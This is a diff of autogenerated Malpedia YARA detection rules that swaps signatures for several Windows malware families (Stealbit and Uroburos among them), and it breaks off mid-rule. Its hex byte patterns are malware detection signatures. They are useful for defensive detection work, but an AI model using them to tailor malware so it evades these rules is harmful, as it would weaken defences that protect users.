"59888b60-a3e6-5e9f-a441-429646fe0731" + date = "2023-07-11" + modified = "2023-07-15" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_061_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "1d2dbc7055590af657485c9c8d5afa6cd108c9897c8a3274dd24779cb78842a6" + logic_hash = "ee3ce5b6c77f09c690f7a934c26be09c58c4fcdee70275b61c00e527d8aa097d" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230705" + malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" + malpedia_version = "20230715" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c89e9 0f11642440 e8???????? 803b00 0f8515ffffff 488b4c2468 4885c9 } - $sequence_1 = { 894c2430 4889ac24b0000000 e9???????? 4981ffff7f0000 4c89f2 488b4b08 490f4ed7 } - $sequence_2 = { 488d051e3a0800 48895110 48894120 48c741183a000000 48c7410800000000 48c7442420a1060000 e8???????? } - $sequence_3 = { e8???????? 488b442440 488b542448 44886c0208 4883c001 0f8093040000 488b542448 } - $sequence_4 = { e8???????? 4c8b442430 48ba0000000000000040 4889f1 4c01e9 0f80b1000000 4885c9 } - $sequence_5 = { f30f6f25???????? 4889ea 41b8a94d975e 4c89e9 4c899c2408010000 4c89942400010000 0f11a42410010000 } - $sequence_6 = { 488b9424f0000000 4889d1 4883e904 0f80de0f0000 4839ca 0f8e58100000 4885c9 } - $sequence_7 = { e8???????? 803b00 488b942488000000 488b842480000000 0f8599feffff 4c8b4e58 4c89f1 } - $sequence_8 = { 80f90b 0f873b1a0000 0fb6f2 83ee01 4863f6 4883c60c 48c1e604 } - $sequence_9 = { 4889eb 48897c2440 488b7c2438 4889c5 4c89ee 4c897c2460 } + $sequence_0 = { 8d85d4fdffff 50 e8???????? c9 } + $sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc } + $sequence_2 = { 51 8365fc00 8d45fc 50 68???????? 6801000080 ff15???????? } + $sequence_3 = { 8945f0 0fb705???????? 50 ff15???????? 668945ee } + $sequence_4 = { 68???????? 56 ff15???????? 83c41c 8d4601 5e eb09 } + $sequence_5 = { 7417 03f3 3bf7 7ccb eb2f 7d29 } + $sequence_6 = { 83cfff c6457300 3b7566 7cb5 3b7566 } + $sequence_7 = { 53 57 6a04 33ff 33db } + $sequence_8 = { 5b c9 c20800 81ec00040000 68???????? 68???????? ff15???????? } + $sequence_9 = { eb04 c645fb3d 6a05 8d45f8 50 ff750c c645fc00 } condition: - 7 of them and filesize <1811456 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Waterspout_Auto : FILE +rule MALPEDIA_Win_Croxloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "966cd02d-f7ac-590a-a30e-6be6c0215ec6" + id = "4c54923c-05d0-5bcf-b03e-4330bb61dd7a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.waterspout_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.croxloader_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "791d1c9b538b0f8a628f6a3764a4be7336ff1d48478e7334334b2fc3c8924313" + logic_hash = "c88e829bb61a0a12fc0c92bdb08f88ad90c78cd22176146404aa71918162c3b2" score = 75 quality = 75 tags = "FILE" @@ -154134,32 +156966,85 @@ rule MALPEDIA_Win_Waterspout_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { fec8 53 8841ff 8d4c2418 ff15???????? eb3a 3bf3 } - $sequence_1 = { c684243a01000023 c684243b0100003d c684243c010000ee c684243d0100004c c684243e01000095 c684243f0100000b c684244001000042 } - $sequence_2 = { 8d4c244c 68???????? 51 ff15???????? 8d7c2454 83c9ff 33c0 } - $sequence_3 = { 51 52 ff15???????? 85c0 7415 a1???????? 3bc3 } - $sequence_4 = { 50 8b842410200000 51 52 68???????? 50 } - $sequence_5 = { 6a00 a4 ff15???????? 50 ff15???????? 8b742460 } - $sequence_6 = { 0f84aa000000 6a00 56 55 } - $sequence_7 = { 8d542414 51 52 ffd6 83f801 74db 5f } - $sequence_8 = { a3???????? 8b442428 68???????? 6a00 6a6b } - $sequence_9 = { 33c0 8dbdfcfeffff 85f6 f3ab 7511 8d85fcfeffff 50 } + $sequence_0 = { 488d0dd0590100 eb0c 83f901 750d 488d0dda590100 } + $sequence_1 = { 498b84ff18910100 90 493bc6 0f84eb000000 4885c0 } + $sequence_2 = { 4883ec20 488364243800 4c8d442438 8bd9 488d157aa80000 33c9 } + $sequence_3 = { 4b8b84e010970100 42804cf03d04 38558f ebcc ff15???????? } + $sequence_4 = { 488d0d09520100 e8???????? 488d0d05520100 e8???????? 488b0d???????? e8???????? 488b0d???????? } + $sequence_5 = { 4883f9ff 7406 ff15???????? 48832300 4883c308 488d05fc240100 } + $sequence_6 = { 4c8d0562eb0000 83e23f 488bcb 48c1f906 488d14d2 498b0cc8 8064d138fd } + $sequence_7 = { 8938 e8???????? 488d1db32f0100 4885c0 } + $sequence_8 = { 4c8d05c9890100 ba920e0332 b95595db6d e8???????? 4c8d05038a0100 ba436a459e b9edb0da1e } + $sequence_9 = { 3b1d???????? 736a 488bc3 4c8d35de000100 83e03f 488bf3 48c1fe06 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <241664 } -rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE +rule MALPEDIA_Win_Uroburos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b16102ee-c7a4-5abc-870b-b75814e7493c" + id = "205256f7-2469-53ee-990c-6fdfb536a7d1" + date = "2023-01-25" + modified = "2023-01-26" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.uroburos_auto.yar#L1-L234" + license_url = "N/A" + logic_hash = "7cd6167d1ac85667ccf6f37a04c885a4dbb4d487c7aa8e68ed00f9a40de671ad" + score = 75 + quality = 73 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20230124" + malpedia_hash = "2ee0eebba83dce3d019a90519f2f972c0fcf9686" + malpedia_version = "20230125" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 7526 85d2 7411 8b493c } + $sequence_1 = { 85d2 7406 8d4801 0fafcd } + $sequence_2 = { 09c9 7407 ffd1 a1???????? 832d????????04 3905???????? 73de } + $sequence_3 = { 85c0 7405 e9???????? 448bc7 } + $sequence_4 = { 8b493c 8bc2 4881c108010000 483bc1 } + $sequence_5 = { 29c0 eb4e 57 56 } + $sequence_6 = { 85c0 750d 48837c245000 0f95c0 8803 33c0 } + $sequence_7 = { 895c2430 e9???????? 33d2 448d4268 } + $sequence_8 = { 09c0 7503 21450c 837d0c00 } + $sequence_9 = { 83fe01 89450c 750c 09c0 7537 57 50 } + $sequence_10 = { 54 5d 53 8b5d08 56 8b750c 09f6 } + $sequence_11 = { 5f 09ff 59 751e 56 ff15???????? 8d86e8030000 } + $sequence_12 = { 40 c20c00 55 54 5d } + $sequence_13 = { 7704 4183c220 4585c9 740a 453bca 7505 4d85c0 } + $sequence_14 = { 8bc1 f7f5 85d2 7406 } + $sequence_15 = { 7433 eb13 8b0d???????? 8b09 09c9 7407 } + $sequence_16 = { 48 8bf0 49 2bf5 4c } + $sequence_17 = { 83c601 49 83c508 41 3bdf 7c82 45 } + $sequence_18 = { 750a 8d43ff e9???????? 33db } + $sequence_19 = { b901000000 e8???????? 48 85c0 48 8bd8 } + $sequence_20 = { 85c0 7434 48 83c310 83c701 48 } + $sequence_21 = { ff15???????? 44 8bd8 49 c1e320 4c } + $sequence_22 = { 8b8f58010000 e8???????? 48 895c2430 } + $sequence_23 = { 8b5c2450 48 83c448 c3 4c 8bc6 } + + condition: + 7 of them and filesize <1136640 +} +rule MALPEDIA_Win_Rokku_Auto : FILE +{ + meta: + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "75b8aef9-2da5-556e-9635-075190f42681" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphical_neutrino_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rokku_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "650397c4d3167e6ec1c66b8947fe66982f57b8190e3a878616091180b7325b66" + logic_hash = "3a863d12b65613db8f002333dfdefeb5bdf603888d10aa587187b07349134f7e" score = 75 quality = 75 tags = "FILE" @@ -154173,34 +157058,34 @@ rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4489c7 4889f2 48c7410800000000 4531c0 4889d9 4c8d6c2450 e8???????? } - $sequence_1 = { ff15???????? 4883fe10 7f1c 41b828400000 } - $sequence_2 = { 48c78424c800000002000000 48898424c0000000 e8???????? 4c8da424c0000000 488d842460050000 48c78424c800000002000000 } - $sequence_3 = { eb07 b001 80fa09 7478 } - $sequence_4 = { 8806 488d4602 885601 eb2d b964000000 } - $sequence_5 = { 53 4883ec20 4c8b6108 4889cb 4c3b6110 740f } - $sequence_6 = { ebcc 31db 4c89ea 4c89e1 4189de ffc3 } - $sequence_7 = { 7430 c605????????01 31c0 8a1403 881406 48ffc0 4883f81f } - $sequence_8 = { 4155 4154 53 4883ec20 c60100 4889cb 4989d5 } - $sequence_9 = { bd07000000 eb32 41b9a0860100 bd06000000 eb25 41b910270000 bd05000000 } + $sequence_0 = { 0f2805???????? 0f114561 8ac1 028541ffffff 30840d42ffffff } + $sequence_1 = { 8bc1 8b942444000300 0bc2 0f8456020000 6a06 } + $sequence_2 = { 8d141b f7ea 8bf8 8bda 8bc1 f76c2470 03f8 } + $sequence_3 = { 89442438 8b44246c 89442418 8b442468 89442414 8b442464 89442444 } + $sequence_4 = { 8b0e e8???????? 33c9 84c0 0f454d08 890e eb1f } + $sequence_5 = { c706???????? 8365fc00 8b4e04 85c9 740d 8b01 ff5010 } + $sequence_6 = { 13ea f76c2454 896c2420 01442410 8d0436 8b742460 } + $sequence_7 = { 8b7a18 8b5220 337918 335120 23fd 8b4824 23d5 } + $sequence_8 = { 894d10 8b4c2414 0fa4c119 8b4c2468 c1e019 2bf0 8bc7 } + $sequence_9 = { 55 56 57 898c24ac000000 8b02 89442454 8b4204 } condition: - 7 of them and filesize <674816 + 7 of them and filesize <548864 } -rule MALPEDIA_Win_Stealbit_Auto : FILE +rule MALPEDIA_Win_Cobint_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ba610849-1495-5151-b945-327f0dc5f838" + id = "817f690c-d59f-5f8a-a3d9-41671b2ba114" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stealbit_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cobint_auto.yar#L1-L246" license_url = "N/A" - logic_hash = "0ba0bc4f1da3f2dc67b8b88d21908b92c199e11ae8a3f814064895150fd93270" + logic_hash = "138f47bd93e47d27bded8ff6cb142802d64943eb32ae6054eb04266b57a32a5b" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -154212,32 +157097,46 @@ rule MALPEDIA_Win_Stealbit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4e30 e8???????? 8b4e30 e8???????? 83663000 8d562c } - $sequence_1 = { 8d8580fbffff 50 e8???????? 8bc8 e8???????? ffd0 8bd8 } - $sequence_2 = { 8bfa 8bd9 e8???????? 8bc8 e8???????? ffd0 8bf0 } - $sequence_3 = { e8???????? 8bc8 e8???????? ffd0 6a02 68bf000000 53 } - $sequence_4 = { c786a802000000000000 8d7e50 33db 8b4620 } - $sequence_5 = { 6a6f 66898546ffffff 33c0 66898548ffffff 58 6a63 668985d2fcffff } - $sequence_6 = { 66899570feffff 66899574feffff 5a 6a6d 58 6a69 66898500feffff } - $sequence_7 = { 6689859afeffff 33c0 668955de 5a 6a61 6689bd86feffff } - $sequence_8 = { 8945f8 e8???????? 03c0 8bce 8bd0 e8???????? 6a0c } - $sequence_9 = { e8???????? 8bc8 e8???????? 3d15cffdb1 740b 46 3bf7 } + $sequence_0 = { 83c410 5e 5d c3 a1???????? 56 33f6 } + $sequence_1 = { 3931 740d 40 83c110 83f820 } + $sequence_2 = { 57 ff15???????? 8b15???????? 8bc6 8bca } + $sequence_3 = { ff7508 e8???????? 83c40c 0fb6c0 5d c3 ff751c } + $sequence_4 = { 33f6 a1???????? 03c6 3938 } + $sequence_5 = { ffd6 f7d8 c745f404000000 1bc0 } + $sequence_6 = { 6a65 eb31 85db 743a 3bde 7336 53 } + $sequence_7 = { 59 5d c3 ff7508 6a00 ff35???????? } + $sequence_8 = { 90 90 e10b 96 7c90 90 } + $sequence_9 = { 90 90 749b 807ce19a80 7c90 } + $sequence_10 = { 807c909090 90 90 90 90 90 } + $sequence_11 = { 3c2e 7404 3c2c 7506 41 8a0431 2c20 } + $sequence_12 = { ffd6 6a04 8d45c0 c745c001000000 } + $sequence_13 = { 7202 04e0 8bcf 0fb6c0 c1c108 03c7 } + $sequence_14 = { c745c001000000 50 6a41 53 ffd6 baf608f7a4 } + $sequence_15 = { 837d1000 740d 8b5508 0355f0 } + $sequence_16 = { 0355f0 8a45ec 8802 eb0b 8b4d08 034df0 8a55ed } + $sequence_17 = { 83c005 c3 31b7807c30ae 807c909090 90 bdfd807c90 90 } + $sequence_18 = { 3bcf 7ce2 8b4dbc 8d9524feffff e8???????? 8d8524feffff 50 } + $sequence_19 = { 8d3c08 66391e 75e3 8b5df4 } + $sequence_20 = { 749b 807ce19a80 7c90 90 90 90 } + $sequence_21 = { 8bcf 8bf0 e8???????? 8945f8 8d45c4 50 8d45f0 } + $sequence_22 = { 90 90 bffc807c28 1a807c170e81 7cd7 9b } + $sequence_23 = { 8b75f8 85c0 7412 814df080330000 8d45f0 6a04 50 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Nettraveler_Auto : FILE +rule MALPEDIA_Win_Mirrorkey_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "494d7b5b-e566-59c9-b0c7-fe620930e93d" + id = "e800f2ca-d12e-53d0-a0d8-c0a956e2c2e3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nettraveler_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mirrorkey_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "ca8cfc3fd83dc1a9e063f01d8d61d4c33014172373ecd89db27946ab9125b077" + logic_hash = "63df7495a525d1f228b934ad2c4fefa8fb21a89fd4e60713963ec70e2cb5c67e" score = 75 quality = 75 tags = "FILE" @@ -154251,32 +157150,32 @@ rule MALPEDIA_Win_Nettraveler_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd3 c70424???????? ff7508 a3???????? } - $sequence_1 = { 81ec8c000000 56 57 ff7508 8bf1 e8???????? 8bf8 } - $sequence_2 = { 83650800 83c70c 83c428 85ff 897df0 0f8eb6000000 bf00040000 } - $sequence_3 = { 53 68???????? ffd6 80a5dcf7ffff00 59 59 baff000000 } - $sequence_4 = { 0bdf 33da 035dc4 8d9c18827e53f7 8bc3 c1e81a c1e306 } - $sequence_5 = { 0bd7 8b7dfc 0355e4 8dbc178a4c2a8d 8bd7 c1e214 c1ef0c } - $sequence_6 = { ff750c ff75d4 50 e8???????? 83c414 8945ec } - $sequence_7 = { e8???????? 83c418 8d45fc 897dfc 50 } - $sequence_8 = { ffd7 8945fc 8d4308 50 ffd7 8065e400 } - $sequence_9 = { 33df 035dc0 8d9c1992cc0c8f 8bcb c1e30a c1e916 0bcb } + $sequence_0 = { 0f57c0 0f1145d8 ff15???????? c70016000000 ff15???????? 8d45d4 50 } + $sequence_1 = { 895914 0fb77806 85ff 7414 8d4b10 8b4104 0301 } + $sequence_2 = { ff15???????? 83c40c c744241000000000 33c0 c644242c00 8944242d 8d742433 } + $sequence_3 = { 8bf9 8b7508 8d45a4 50 } + $sequence_4 = { 83c004 8b7dfc 83ff01 7f87 5f } + $sequence_5 = { 730b 68???????? ff15???????? 894610 837e1410 } + $sequence_6 = { 897508 2bda ebaa 8d5aff 83c704 eba2 } + $sequence_7 = { 8d4dd8 50 e8???????? 8d4d8c e8???????? 837de808 7d15 } + $sequence_8 = { 6a00 51 89542414 ff15???????? 83c408 83f8ff } + $sequence_9 = { 53 8b5d0c 894dfc 8b4d08 56 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <117760 } -rule MALPEDIA_Win_Tflower_Auto : FILE +rule MALPEDIA_Win_Treasurehunter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b4660b68-51d0-51ac-bbdd-acf4449bc6d1" + id = "d910c7d8-579e-5e04-9944-d334673c4daa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tflower_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.treasurehunter_auto.yar#L1-L103" license_url = "N/A" - logic_hash = "82eb88790bbfb711d9ea01573d045bd4c38f5ceb308c5ccacf5ea018abeab10b" + logic_hash = "15ce0cdcd8ce74cbd944226eb16c8cf48295e060eba7d0ca2d750492d2eadd11" score = 75 quality = 75 tags = "FILE" @@ -154290,38 +157189,30 @@ rule MALPEDIA_Win_Tflower_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0001 0200 0103 0303 } - $sequence_1 = { 0001 7708 00f3 7608 } - $sequence_2 = { 0002 7408 00f7 7308 } - $sequence_3 = { 001a 0c05 003c0c 05004e0c05 } - $sequence_4 = { 0008 7408 0002 7408 } - $sequence_5 = { c1e104 0fb6d0 8b84248c000000 c1e204 8baa406f4f00 } - $sequence_6 = { 000f 7708 0001 7708 } - $sequence_7 = { c7405420164600 eb5e 57 e8???????? } - $sequence_8 = { 3bf7 72e3 5b 5f b001 5e } - $sequence_9 = { 0010 740b 0021 740b } - $sequence_10 = { 0fb6c0 330c85c0fe4e00 0fb6c3 8b5f28 330c85c0fa4e00 33f1 8d0411 } - $sequence_11 = { 8b75fc 8b7df4 c60301 eb06 8b75fc 8b7df4 } - $sequence_12 = { 894c2448 7436 8b442410 8d90c8795000 } - $sequence_13 = { 330c8520dd4e00 8b442414 c1e818 330c8520d94e00 8b44242c 0fb6c0 } - $sequence_14 = { 6a35 eb2b 8bfb eb04 8b442414 ff742420 } - $sequence_15 = { 000b 8605???????? 007885 0500788605 } + $sequence_0 = { 75f9 2bf0 e8???????? 8bd0 } + $sequence_1 = { 53 56 8b35???????? 8bd9 8b4d08 57 } + $sequence_2 = { 8bf8 e8???????? 68???????? 57 e8???????? } + $sequence_3 = { 8bd9 8b4d08 57 8955fc e8???????? 8bce 8bf8 } + $sequence_4 = { 57 8bf9 8bca e8???????? 8b7508 } + $sequence_5 = { 56 50 8903 ff15???????? 8b4dfc } + $sequence_6 = { 7e0b 4a e8???????? 0fafc6 5e c3 } + $sequence_7 = { e8???????? b9???????? a3???????? e8???????? 5f 5e a3???????? } condition: - 7 of them and filesize <6578176 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Sphijacker_Auto : FILE +rule MALPEDIA_Win_Webmonitor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02bebd5c-3234-51fc-b1c7-c2b759df0e10" + id = "aca2309c-f3e7-5982-bcd7-9e22f09c3e41" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sphijacker_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webmonitor_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "b2eaf40d7ebf7c9c6d61e8db2a040734266a57e7998ddc628afd90d30231d5ef" + logic_hash = "7913959618328b6198214b581f33ca34a8ffc8b00c2415ca23bf0e5f2e066370" score = 75 quality = 75 tags = "FILE" @@ -154335,32 +157226,38 @@ rule MALPEDIA_Win_Sphijacker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b0d???????? 488d1d19080200 483bcb 740c } - $sequence_1 = { 8b7808 e9???????? 488b55c8 4c8d05cbb10100 } - $sequence_2 = { 4c8d056b740100 83e23f 488bcf 48c1f906 488d14d2 498b0cc8 8064d138fd } - $sequence_3 = { 7c68 488b4718 488b08 420fb70451 2500800000 7455 488b8360040000 } - $sequence_4 = { 488bd1 488bc1 48c1f806 4c8d05e4bd0100 83e23f 488d14d2 498b04c0 } - $sequence_5 = { 33d2 f20f100d???????? 41b8ee010000 66898dc8070000 } - $sequence_6 = { e8???????? 448ba560010000 8b4c2440 488d15d9e8feff 2b4c2444 41b826000000 894c2440 } - $sequence_7 = { c744242804000000 488d1585e10100 41b904000000 4889442420 4533c0 c7451088888888 ff15???????? } - $sequence_8 = { ff15???????? 488b4d18 4c8d4520 488d159ee00100 ff15???????? 488b4d20 } - $sequence_9 = { 8b4814 c1e90c 4184cd 740e 488b8360040000 4883780800 7419 } + $sequence_0 = { 06 000b 3a58ff 1b03 fd 006cff1e e00e } + $sequence_1 = { 41 0080cd41009c d34100 e8???????? } + $sequence_2 = { 0094be4100d891 41 0084e84100a872 42 00a06a4200f8 } + $sequence_3 = { 0028 fa 41 0014b4 42 } + $sequence_4 = { b9???????? ffe1 ba???????? b9???????? ffe1 ba???????? b9???????? } + $sequence_5 = { 000e 6c 74ff f5 } + $sequence_6 = { ff05???????? 000d???????? 04b8 fe04e4 fd 04e0 fd } + $sequence_7 = { 00dc 7442 000477 42 0028 } + $sequence_8 = { 00e8 dd7000 008bf98b5d1c 8d4de4 } + $sequence_9 = { 00d1 6848007269 48 00856948008b } + $sequence_10 = { 0108 eb5a 8b4508 83ceff } + $sequence_11 = { 0108 8b442410 891e 894604 } + $sequence_12 = { 00d1 6848004069 48 00d1 } + $sequence_13 = { 000f b681 fc b84500ff24 } + $sequence_14 = { 00e8 f61c00 008bd9895df0 8b451c } + $sequence_15 = { 00856948008b ff558b ec 83ec0c } condition: - 7 of them and filesize <808960 + 7 of them and filesize <1867776 } -rule MALPEDIA_Win_Orangeade_Auto : FILE +rule MALPEDIA_Win_Maoloa_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a790e493-320f-57de-9b62-d13796c94676" + id = "c9cb938f-8aed-56a4-9406-4a70e3564e5d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orangeade_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maoloa_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "bc9cfd6680cc4f32cd41e9edf43afa43b54975c598906df96ea95e31fa6c1612" + logic_hash = "aa3156b629c721039014b4e703faa79f34b5d8a33e4caf3d82f64b9729ae8335" score = 75 quality = 75 tags = "FILE" @@ -154374,32 +157271,32 @@ rule MALPEDIA_Win_Orangeade_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bb42428050000 50 8bce e8???????? c744241001000000 } - $sequence_1 = { 50 8d942470020000 51 52 ff15???????? } - $sequence_2 = { f3ab 66ab aa 8d842468020000 50 } - $sequence_3 = { 6881000000 6a00 c784249428010000000000 ff15???????? 8bf0 56 } - $sequence_4 = { aa b93f000000 33c0 8dbc2465010000 } - $sequence_5 = { 8d4c2424 c684248828010002 e8???????? 8d4c2410 c684248828010001 e8???????? 8d4c2414 } - $sequence_6 = { b93f000000 33c0 8d7c2479 885c2478 f3ab } - $sequence_7 = { 68???????? 8d4c2410 e8???????? 68???????? 6884000000 53 ff15???????? } - $sequence_8 = { e8???????? 83c404 8d4c2424 c684248828010002 } - $sequence_9 = { 50 8d4c2410 c684248400000001 e8???????? } + $sequence_0 = { 8b55fc 8bcb 85c0 7817 8d45f0 50 e8???????? } + $sequence_1 = { 50 ffb5f0e4ffff 8b35???????? ffd6 8b85c0e4ffff c1e015 03858ce5ffff } + $sequence_2 = { 8b4df8 33cd e8???????? 8be5 5d c3 befcffffff } + $sequence_3 = { 83c404 85f6 0f8590000000 6a01 8bd7 8bcf e8???????? } + $sequence_4 = { 85c0 8d8d00e0ffff 0f45ce 8bf1 89b5f8dfffff 8d85f8efffff 50 } + $sequence_5 = { b910000000 0f43c1 8d4c2418 2bf8 } + $sequence_6 = { 8d97a9cfde4b 33c1 894db4 0345d0 03d0 8b7db4 c1c20b } + $sequence_7 = { 8bd3 c707ffffffff 8bcf e8???????? 83c404 8bf0 8b85e0f9ffff } + $sequence_8 = { 0f1f00 0fb601 8d4901 30440eff 0fb641ff 30440aff 83ef01 } + $sequence_9 = { 5e 5b 8be5 5d c3 8d45f0 8bd1 } condition: - 7 of them and filesize <139264 + 7 of them and filesize <586752 } -rule MALPEDIA_Win_Tinyloader_Auto : FILE +rule MALPEDIA_Win_Ployx_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0d2fde25-ff7d-54ba-a2fe-e20fb626403d" + id = "7a9ae933-1e52-56f8-912b-cfaf3c1a4d79" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinyloader_auto.yar#L1-L168" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ployx_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "544c827393b5f9a7c28206644605d3c060467a9b94170d9210a95463f44b3867" + logic_hash = "92d48577836748eb447c5a838f0c9893d40b34aa95d5979c4991a0399ec4439d" score = 75 quality = 75 tags = "FILE" @@ -154413,38 +157310,32 @@ rule MALPEDIA_Win_Tinyloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 90 8bbb97114000 90 8938 90 } - $sequence_1 = { 6689c8 90 6a40 6800300000 6800800200 6a00 } - $sequence_2 = { 039d58080000 6a00 6800040000 53 ffb5b8050000 ff15???????? } - $sequence_3 = { 31db 90 31c9 90 } - $sequence_4 = { 8b5510 01da 8b12 8b4500 } - $sequence_5 = { 81c300040000 6a00 ff33 ff7500 ffb5b8050000 ff15???????? 83f8ff } - $sequence_6 = { 8b4500 83c008 c70000000000 c7855808000000000000 8b5d00 039d58080000 } - $sequence_7 = { 83bd580800000c 7302 ebc3 8b5d00 } - $sequence_8 = { ff15???????? 8985b8050000 6832a00000 ff15???????? 8b9da8050000 66894302 66c7030200 } - $sequence_9 = { 90 89c6 90 0500400100 } - $sequence_10 = { ffb5a0050000 6802020000 